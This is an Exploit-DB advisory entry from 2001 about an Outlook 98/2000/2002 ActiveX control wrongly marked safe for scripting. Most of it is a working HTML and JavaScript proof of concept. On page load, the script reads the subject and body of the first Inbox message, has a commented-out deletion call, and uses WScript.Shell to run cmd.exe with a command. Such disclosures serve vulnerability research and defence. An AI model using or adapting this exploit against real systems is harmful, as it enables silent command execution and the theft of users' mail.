Microsoft Outlook 98/2000/2002 - Arbitrary Code Execution

EDB-ID:

21004


Platform:

Windows

Published:

2001-07-12

source: https://www.securityfocus.com/bid/3026/info

Microsoft Outlook introduces a vulnerability that may allow attackers to execute arbitrary commands on a target system.

The vulnerability is due to a new ActiveX control called 'Microsoft Outlook View Control'. The flaw is that this control is marked 'safe for scripting' when it should not be. It is therefore accessible by scripts.

Scripts can execute commands without user knowledge or consent. 

This assumes you have at least one message in Outlook XP's Inbox
<br>
<object id="o1"
classid="clsid:0006F063-0000-0000-C000-000000000046"
>
<param name="folder" value="Inbox">
</object>

<script>
function f()
{
//alert(o2.object);
sel=o1.object.selection;
vv1=sel.Item(1);
alert("Subject="+vv1.Subject);
alert("Body="+vv1.Body+"["+vv1.HTMLBody+"]");
alert("May be deleted");
//vv1.Delete();

vv2=vv1.Session.Application.CreateObject("WScript.Shell");

alert("Much more fun is possible");


vv2.Run("C:\\WINNT\\SYSTEM32\\CMD.EXE /c DIR /A /P /S C:\\ ");

}
setTimeout("f()",2000);
</script>